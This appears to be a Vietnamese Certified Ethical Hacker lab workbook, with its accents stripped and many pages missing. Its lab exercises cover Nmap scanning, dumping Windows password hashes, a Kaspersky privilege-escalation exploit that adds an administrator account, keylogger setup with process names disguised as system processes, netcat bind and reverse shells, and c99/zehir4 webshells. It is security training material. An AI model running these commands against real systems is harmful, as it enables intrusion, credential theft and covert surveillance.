Professional Documents
Culture Documents
1-CEH Lab Book Tieng Viet
1-CEH Lab Book Tieng Viet
Mc Lc
Bi 1:..................................................................................................................................... 3
FOOTPRINTING ................................................................................................................ 3
I/ Gii thiu v Foot Print:............................................................................................... 3
II/ Cc bi thc hnh: ...................................................................................................... 3
Bi 1: Tm thng tin v Domain................................................................................... 3
Bi 2: Tm thng tin email ........................................................................................... 5
Bi 2:..................................................................................................................................... 7
SCANNING.......................................................................................................................... 7
I/ Gii thiu v Scanning: ............................................................................................... 7
II/ Cc Bi thc hnh....................................................................................................... 7
Bi thc hnh 1: S dng Phn mm Nmap.................................................................. 7
Bi thc hnh th 2: S dng phn mm Retina pht hin cc vulnerabilities v tn
cng bng Metaesploit framework................................................................................ 13
Bi 3:................................................................................................................................... 18
SYSTEM HACKING......................................................................................................... 18
I/ Gii thiu System Hacking:....................................................................................... 18
II/ Thc hnh cc bi Lab ............................................................................................. 18
Bi 1: Crack password nt b ni b........................................................................ 18
Bi 2: S dng chng trnh pwdump3v2 khi c c 1 user administrator ca
my nn nhn c th tm c thng tin cc user cn li. ................................... 20
Bi Lab 3: Nng quyn thng qua chng trnh Kaspersky Lab ............................ 23
Bi Lab 4: S dng Keylogger................................................................................... 25
Bi Lab 5: S dng Rootkit v xa Log file .............................................................. 27
Bi 4:................................................................................................................................... 30
TROJAN v BACKDOOR ................................................................................................ 30
I/ Gii thiu v Trojan v Backdoor: ........................................................................... 30
II/ Cc bi thc hnh: .................................................................................................... 30
Bi 1 S dng netcat: ................................................................................................. 30
Bi 2: S dng Trojan Beast v detect trojan........................................................... 32
Mun s dng Trojan Beast, ta cn phi xy dng 1 file Server ci ln my nn nhn, sau
file server ny s lng nghe nhng port c nh v t my tn cng ta s connect
vo my nn nhn thng qua cng ny. ........................................................................ 32
Bi 3: S dng Trojan di dng Webbase .............................................................. 35
Bi 5:................................................................................................................................... 38
CC PHNG PHP SNIFFER ..................................................................................... 38
I/ Gii thiu v Sniffer .................................................................................................. 38
Bi 6:................................................................................................................................... 65
Tn Cng t chi dch v DoS........................................................................................... 65
I/ Gii thiu: .................................................................................................................. 65
II/ M t bi lab: ............................................................................................................ 67
Bi Lab 1: DoS bng cch s dng Ping of death. ................................................... 67
Bi lab 2: DoS 1 giao thc khng s dng chng thc(trong bi s dng giao thc
RIP)............................................................................................................................. 69
Bi Lab 3: S dng flash DDoS ............................................................................ 72
Bi 7:................................................................................................................................... 74
Social Engineering ............................................................................................................. 74
I/ Gii Thiu .................................................................................................................. 74
VSIC Education Corporation
Trang 1
Trang 2
Bi 1:
FOOTPRINTING
I/ Gii thiu v Foot Print:
y l k thut gip hacker tm kim thng tin v 1 doanh nghip, c nhn hay t
chc. Bn c th iu tra c rt nhiu thng tin ca mc tiu nh vo k thut ny. V d
trong phn thc hnh th 1 chng ta p dng k thut ny tm kim thng tin v mt
domain(v d l www.itvietnam.com) v xem th email lin lc ca domain ny l ca ai,
trong phn thc hnh th 2 chng ta truy tm 1 danh sch cc email ca 1 keywork cho trc,
phng php ny hiu qu cho cc doanh nghip mun s dng marketing thng qua hnh
thc email v.v. Trong giai don ny Hacker c gng tm cng nhiu thng tin v doanh
nghip(thng qua cc knh internet v phone) v c nhn(thng qua email v hot ng ca
c nhn trn Internet), nu thc hin tt bc ny Hacker c th xc nh c nn tn
cng vo im yu no ca chng ta. V d mun tn cng domain www.itvietnam.com th
Hacker phi bit c a ch email no l ch ca domain ny v tm cch ly password ca
email thng qua tn cng mail Server hay sniffer trong mng ni b v.v. V cui cng ly
c Domain ny thng qua email ch ny.
II/ Cc bi thc hnh:
Bi 1: Tm thng tin v Domain
Ta vo trang www.whois.net tm kim thng tin v nh vo domain mnh mun
tm kim thng tin
Trang 3
Trang 4
Trang 5
Trang 6
Bi 2:
SCANNING
I/ Gii thiu v Scanning:
Scanning hay cn gi l qut mng l bc khng th thiu c trong qu trnh tn
cng vo h thng mng ca hacker. Nu lm bc ny tt Hacker s mau chng pht hin
c li ca h thng v d nh li RPC ca Window hay li trn phm mm dch v web
nh Apache v.v. V t nhng li ny, hacker c th s dng nhng on m c hi(t cc
trang web) tn cng vo h thng, ti t nht ly shell.
Phn mm scanning c rt nhiu loi, gm cc phm mm thng mi nh Retina,
GFI, v cc phn mm min ph nh Nmap,Nessus. Thng thng cc n bn thng mi c
th update cc bug li mi t internet v c th d tm c nhng li mi hn. Cc phn
mm scanning c th gip ngi qun tr tm c li ca h thng, ng thi a ra cc gii
php sa li nh update Service patch hay s dng cc policy hp l hn.
II/ Cc Bi thc hnh
Bi thc hnh 1: S dng Phn mm Nmap
Trc khi thc hnh bi ny, hc vin nn tham kho li gio trnh l thuyt v cc
option ca nmap.
Chng ta c th s dng phn mm trong CD CEH v5, hay c th download bn mi
nht t website: www.insecure.org. Phn mm nmap c 2 phin bn dnh cho Win v dnh
cho Linux, trong bi thc hnh v Nmap, chng ta s dng bn dnh cho Window.
thc hnh bi ny, hc vin nn s dng Vmware v boot t nhiu h iu hnh
khc nhau nh Win XP sp2, Win 2003 sp1, Linux Fedora Core, Win 2000 sp4,v.v.
Trc tin s dng Nmap do thm th xem trong subnet c host no up v cc port
cc host ny m, ta s dng lnh Nmap h xem li cc option ca Nmap, sau thc hin
lnh Nmap sS 10.100.100.1-20. V sau c kt qu sau:
C:\Documents and Settings\anhhao>nmap -sS 10.100.100.1-20
Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:27 Pacific Standard
Time
Interesting ports on 10.100.100.1:
Not shown: 1695 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
MAC Address: 00:0C:29:09:ED:10 (VMware)
Interesting ports on 10.100.100.6:
Not shown: 1678 closed ports
PORT STATE SERVICE
VSIC Education Corporation
Trang 7
Trang 8
Trang 9
Completed SYN Stealth Scan at 10:46, 1.56s elapsed (1697 total ports)
Initiating OS detection (try #1) against 10.100.100.7
Host 10.100.100.7 appears to be up ... good.
Interesting ports on 10.100.100.7:
Not shown: 1693 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
MAC Address: 00:0C:29:95:A9:03 (VMware)
Device type: general purpose
Running: Microsoft Windows 2003
OS details: Microsoft Windows 2003 Server SP1
OS Fingerprint:
OS:SCAN(V=4.20%D=8/2%OT=135%CT=1%CU=36092%PV=Y%DS=1%G=Y%M=000C
29%TM=46B2187
OS:3%P=i686-pc-windowswindows)SEQ(SP=FF%GCD=1%ISR=10A%TI=I%II=I%SS=S%TS=0)
OS:OPS(O1=M5B4NW0NNT00NNS%O2=M5B4NW0NNT00NNS%O3=M5B4NW0NNT0
0%O4=M5B4NW0NNT0
OS:0NNS%O5=M5B4NW0NNT00NNS%O6=M5B4NNT00NNS)WIN(W1=FAF0%W2=F
AF0%W3=FAF0%W4=F
OS:AF0%W5=FAF0%W6=FAF0)ECN(R=Y%DF=N%T=80%W=FAF0%O=M5B4NW0NN
S%CC=N%Q=)T1(R=Y
OS:%DF=N%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=80%W=0%S=
Z%A=S%F=AR%O=%RD
OS:=0%Q=)T3(R=Y%DF=N%T=80%W=FAF0%S=O%A=S+%F=AS%O=M5B4NW0NNT
00NNS%RD=0%Q=)T4
OS:(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T
=80%W=0%S=Z%A=S+%
OS:F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=
0%Q=)T7(R=Y%DF=N%
OS:T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%TOS=0
%IPL=B0%UN=0%RIP
OS:L=G%RID=G%RIPCK=G%RUCK=G%RUL=G%RUD=G)IE(R=Y%DFI=S%T=80%T
OSI=Z%CD=Z%SI=S%
OS:DLI=S)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IPID Sequence Generation: Incremental
Trang 10
Trang 11
Trang 12
OS:R%O=%RD=0%Q=)T5(R=Y%DF=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0
%Q=)T6(R=Y%DF=N%T
OS:=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=N%T=80%W=0%S=Z
%A=S+%F=AR%O=%RD=
OS:0%Q=)U1(R=Y%DF=N%T=80%TOS=0%IPL=38%UN=0%RIPL=G%RID=G%RIPCK
=G%RUCK=G%RUL=
OS:G%RUD=G)IE(R=Y%DFI=S%T=80%TOSI=S%CD=Z%SI=S%DLI=S)
Tuy nhin ta c th nhn din rng y l 1 Server chy dch v SQL v Web Server,
by gi ta s dng lnh Nmap v p 80 sV 10.100.100.16 xc nh version ca IIS.
C:\Documents and Settings\anhhao>nmap -p 80 -sV 10.100.100.16
Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 11:01 Pacific Standard
Time
Interesting ports on 10.100.100.16:
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS webserver 5.0
MAC Address: 00:0C:29:D6:73:6D (VMware)
Service Info: OS: Windows
Service detection performed. Please report any incorrect results at http://insec
ure.org/nmap/submit/ .
Nmap finished: 1 IP address (1 host up) scanned in 6.750 seconds
Vy ta c th on c phn nhiu host l Window 2000 Server. Ngoi vic thc
hnh trn chng ta c th s dng Nmap trace, lu log v.v
Bi thc hnh th 2: S dng phn mm Retina pht hin cc vulnerabilities v tn cng
bng Metaesploit framework.
Retina ca Ieye l phn mm thng mi(cng nh GFI, shadow v.v ) c th update
cc l hng 1 cch thng xuyn v gip cho ngi Admin h thng c th a ra nhng gii
php x l.
By gi ta s dng phn mm Retina d tm li ca my Win 2003
Sp0(10.100.100.6)
VSIC Education Corporation
Trang 13
Vulnerability Name
Count
1.
echo service
2.
3.
4.
Null Session
5.
6.
telnet service
7.
DCOM Enabled
8.
9.
10.
11.
Trang 14
12.
13.
14.
15.
Count
1.
TCP:7
ECHO - Echo
2.
TCP:9
DISCARD - Discard
3.
TCP:13
DAYTIME - Daytime
4.
TCP:17
5.
TCP:19
6.
TCP:23
TELNET - Telnet
7.
TCP:42
8.
TCP:53
9.
TCP:80
10.
TCP:135
11.
TCP:139
12.
TCP:445
MICROSOFT-DS - Microsoft-DS
13.
TCP:1025
LISTEN - listen
14.
TCP:1026
NTERM - nterm
15.
TCP:1030
16.
TCP:2103
17.
TCP:2105
18.
TCP:3389
19.
TCP:8080
20.
UDP:7
ECHO - Echo
Trang 15
Rank
Count
1.
Trang 16
Trang 17
Bi 3:
SYSTEM HACKING
I/ Gii thiu System Hacking:
Nh chng ta hc phn l thuyt, Module System Hacking bao gm nhng k
thut ly Username v Password, nng quyn trong h thng, s dng keyloger ly thng
tin ca i phng(trong bc ny cng c th Hacker li Trojan, vn hc chng
tip theo), n thng tin ca process ang hot ng(Rootkit), v xa nhng log h thng.
i vi phn ly thng tin v username v password Local, hacker c th crack pass
trn my ni b nu s dng phn mm ci ln my , hay s dng CD boot Knoppix ly
syskey, bc tip theo l gii m SAM ly hash ca Account h thng. Chng ta c th ly
username v password thng qua remote nh SMB, NTLM(bng k thut sniffer s hc
chng sau) hay thng qua 1 Account ca h thng bit(s dng PWdump3)
Vi phn nng quyn trong h thng, Hacker c th s dng l hng ca Window, cc
phn mm chy trn h thng nhm ly quyn Admin iu khin h thng. Trong bi thc
hnh ta khai thc l hng ca Kaberky Lab 6.0 nng quyn t user bnh thng sang user
Administrator trong Win XP sp2.
Phn Keylogger ta s dng SC-keyloger xem cc hot ng ca nn nhn nh gim
st ni dung bn phm, thng tin v chat, thng tin v s dng my, thng tin v cc ti khon
user s dng.
Tip theo ta s dng Rootkit n cc process ca keyloger, lm cho ngi admin h
thng khng th pht hin ra l mnh ang b theo di. bc ny ta s dng vanquis rootkit
n cc process trong h thng. Cui cng ta xa log v du vt xm nhp h thng.
II/ Thc hnh cc bi Lab
Bi 1: Crack password nt b ni b
Trang 18
Trang 19
Trang 20
Trang 21
haoceh:1016:B3FF8763A6B5CE26AAD3B435B51404EE:7AD94985F28454259BF2A03821
FEC8DB:::
hicehclass:1023:B2BEF1B1582C2DC0AAD3B435B51404EE:D6198C25F8420A93301A579
2398CF94C:::
IUSR_113SSR3JKXGW3N:1003:449913C1CEC65E2A97074C07DBD2969F:9E6A4AF346F1A1F483
3ABFA52ADA9462:::
IWAM_113SSR3JKXGW3N:1004:4431005ABF401D86F92DBAC26FDFD3B8:188AA6E0737F12D16
D60F8B64F7AE1FA:::
lylam:1012:EE94DC327C009996AAD3B435B51404EE:7A63FB0793A85C960A775497C9
D738EE:::
quyen:500:A00B9194BEDB81FEAAD3B435B51404EE:5C800F13A3CE86ED2540DD4E
7331E9A2:::
SUPPORT_388945a0:1001:NO
PASSWORD*********************:F791B19C488F4260723561D4F484EA09:::
tam:1014:NO PASSWORD*********************:NO
PASSWORD*********************:::
test:1017:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B8
9537:::
vic123:1021:CCF9155E3E7DB453AAD3B435B51404EE:3DBDE697D71690A769204BEB
12283678:::
Ta thy thng tin user quyen c ID l 500, y l ID ca user administrator trong
mng, v user Guest l 501. Ngoi thng tin trn, ta c thm thng tin v pash hash ca user,
by gi ta s dng chng trnh Cain tm kim thng tin v password ca cc user khc.
Trang 22
Trang 23
Chy file exe c bin dch exploit vo Kaspersky ang chy di quyn
admin h thng.
S dng lnh telnet 127.0.0.1 8080 truy xut vo shell c quyn admin h
thng. Ta tip tc s dng lnh Net Localgroup administrators hao /add add user hao
vo nhm admin, v s dng lnh net user ti xc nhn
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
D:\WINDOWS\system32>
D:\WINDOWS\system32>net Localgroup administrators hao /add
net Localgroup administrators hao /add
The command completed successfully.
8/3/2007 1:47 PM
9/15/2007 12:35 PM
8/3/2007 1:47 PM
Yes
Trang 24
Yes
Workstations allowed
All
Logon script
User profile
Home directory
Last logon
8/3/2007 1:54 PM
Logon hours allowed
All
*Users
D:\WINDOWS\system32>
Ta thy user hao by gi c quyn Admin trong h thng, v vic nng quyn
thnh cng. Cc bn c th test nhng phn mm tng t t code down t trang
www.milw0rm.com.
Bi Lab 4: S dng Keylogger
Trong bi lab ny, ta s dng phn mm SC Keylogger thu thp thng tin t my
ca nn nhn, vic phi lm phi to ra file keylog, chn mail server relay, ci vo nn nhn.
Sau khi ci phn mm ti file keylogger, by gi ta bt u cu hnh cho sn phm
keylogger ca mnh. u tin ta chn hnh ng c ghi log file bao gm ghi keyboard,
Mouse, v chng trnh chy.
Trang 25
Tip theo ta chn thng tin email m my nn nhn s gi logfile ny. Thng tin ny
c gi 10 pht 1 ln.
Tip theo ta cu hnh mail server relay, v thng tin v process hin th, phn ny
hacker thng thng s dng nhng tn ging vi nhng service c sn trn Window nh
svchost.exe,csrss.exev.v nh la ngi admin. d nhn dng ta chn tn file l
cehkeylogger.
Trang 26
>> C:\WINDOWS\system32\notepad.exe
<< 05-08-07 11:39:23 Untitled - Notepad
>> Chuc lop
Sec<BS><BS><BS>CEH manh khoe, va nhieu thanh dat..
<< 05-08-07 11:39:36 Untitled - Notepad
>> Chuc lop CEH hoc gioi
<< 05-08-07 11:39:41 Untitled - Notepad
>>::::::::::<PRNTSCR><ALT>
<< 05-08-07 11:39:56 Run
>> <WIN-START>ms<DOWN>
<< 05-08-07 11:39:59 Process started
>>
C:\WINDOWS\system32\mspaint.exe
Trang 27
Trang 28
Trang 29
Bi 4:
TROJAN v BACKDOOR
I/ Gii thiu v Trojan v Backdoor:
Trojan v Backdoor c s dng gim st my nn nhn, v l ca sau Hacker c th
vo li h thng my tnh thng qua cng kt ni(port), thng qua mi trng Web(webase).
Loi s dng cng kt ni ta thng thy l netcat, beast, Donald Dick v.v. V loi s dng
mi trng Webbase thng thng l r57,c99, zehir4v.v. c tnh ca Trojan kt ni port l
mi ln kt ni phi m cng, v admin tng i pht hin d dng hn so vi loi
Webbase(thng thng tn cng Web Server). Trong bi thc hnh, chng ta ci th cc
tnh nng ca netcat, beast, c99, zehir4 v phn tch 1 don code mu trojan.
II/ Cc bi thc hnh:
Bi 1 S dng netcat:
1/S dng netcat kt ni shell
Trn my tnh ca nn nhn, bn khi ng netcat vo ch lng nghe, dng ty chn l
(listen) v -p port xc nh s hiu cng cn lng nghe, -e <tn_chng_trnh_cn_chy>
yu cu netcat thi hnh 1 chng trnh khi c 1 kt ni n, thng l shell lnh cmd.exe
(i vi NT) hoc bin/sh (i vi Unix).
E:\>nc -nvv -l -p 8080 -e cmd.exe
listening on [any] 8080 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159
sent 0, rcvd 0: unknown socket error
- trn my tnh dng tn cng, bn ch vic dng netcat ni n my nn
nhn trn cng nh, chng hn nh 8080
C:\>nc -nvv 172.16.84.2 8080
(UNKNOWN) [172.16.84.2] 8080 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
Copyright 1985-1999 Microsoft Corp.
E:\>cd test
cd test
E:\test>dir /w
dir /w
Volume in drive E has no label.
Volume Serial Number is B465-452F
Directory of E:\test
[.] [..] head.log NETUSERS.EXE NetView.exe
ntcrash.zip password.txt pwdump.exe
6 File(s) 262,499 bytes
2 Dir(s) 191,488,000 bytes free
VSIC Education Corporation
Trang 30
C:\test>exit
exit
sent 20, rcvd 450: NOTSOCK
By gi chng ta c c shell v kim soat c my nn nhn.Tuy nhin, sau kt ni
trn, netcat trn my nn nhn cngng lun. yu cu netcat lng nghe tr li sau mi kt
ni, bn dng -L thaycho -l. Lu : -L ch c th p dng cho bn Netcat for Windows, khng
p dng cho bn chy trn Linux.
2/S dng netcat kt ni shell nghch chuyn by pass Firewall:
- dng telnet ni ca s netcat ang lng nghe, k a lnh t ca s ny vo lung
telnet nghch chuyn, v gi kt qu vo ca s kia.
V d:
- trn my dng tn cng(172.16.84.1), m 2 ca s netcat ln lt lng nghe trn cng 80
v 25:
+ ca s Netcat (1)
C:\>nc -nvv -l -p 80
listennng on [any] 80 ...
connect to [172.16.84.1] from <UNKNOWN> [172.16.84.2] 1055
pwd
ls -la
_
+ ca s Netcat (2)
C:\>nc -nvv -l -p 25
listening on [any] 25 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.2] 1056
/
total 171
drwxr-xr-x 17 root root 4096 Feb 5 16:15 .
drwxr-xr-x 17 root root 4096 Feb 5 16:15 ..
drwxr-xr-x 2 root root 4096 Feb 5 08:55 b (?n
drwxr-xr-x 3 root root 4096 Feb 5 14:19 boot
drwxr-xr-x 13 root root 106496 Feb 5 14:18 dev
drwxr-xr-x 37 root root 4096 Feb 5 14:23 et = ?
drwxr-xr-x 6 root root 4096 Feb 5 08:58 home
drwxr-xr-x 6 root root 4096 Feb 5 08:50 l (?b
drwxr-xr-x 2 root root 7168 De = ? 31 1969 mnt
drwxr-xr-x 4 root root 4096 Feb 5 16:18 n = ?
drwxr-xr-x 2 root root 4096 Aug 23 12:03 opt
dr-xr-xr-x 61 root root 0 Feb 5 09:18 pro = ?
drwx------ 12 root root 4096 Feb 5 16:24 root
drwxr-xr-x 2 root root 4096 Feb 5 08:55 sb (?n
VSIC Education Corporation
Trang 31
Trang 32
Trang 33
Cch phng chng: Ngoi cch s dng cc chng trnh Anti Virus v Trojan, ta c th
da v tnh cht thng thng nhng Trojan ny bt buc phi m port no ra ngoi, ta c
th xem bng chng trnh Curr Port hay chng trnh fport.
Trang 34
Trang 35
Ta nh vo lnh Dir xem thng tin cc file trong h thng, vi trojan nh trn ta
c th xem c cc thng tin h thng, c th upload,download thng qua tftp, v add user
vo h thng v d lnh net user hao hao /add, net Localgroup administrators hao /add .
Vo link http://192.168.1.116/zehir4.asp xem v trojan webbase th 2.
Ta thy Trojan ny hng ha v tin dng hn, vic ly file,xa file hon ton
thng qua web, chng ta c th d dng thao tc trn my ca nn nhn.
2/Trojan vi ngn ng PHP: Ta s dng Web server Apache vi trojan c vit bng
ngn ng ny, ngi vit gii thiu n cc bn trojan tiu biu l c99.
u tin bn s dng chng trnh phpeasy ci kt hp 3 gi sau apache, php, v
mysql. Tuy nhin trong bi cc bn ch cn s dng php v apache. Chp cc file trojan v th
mc www c th chy c cc file ny.
VSIC Education Corporation
Trang 36
Trang 37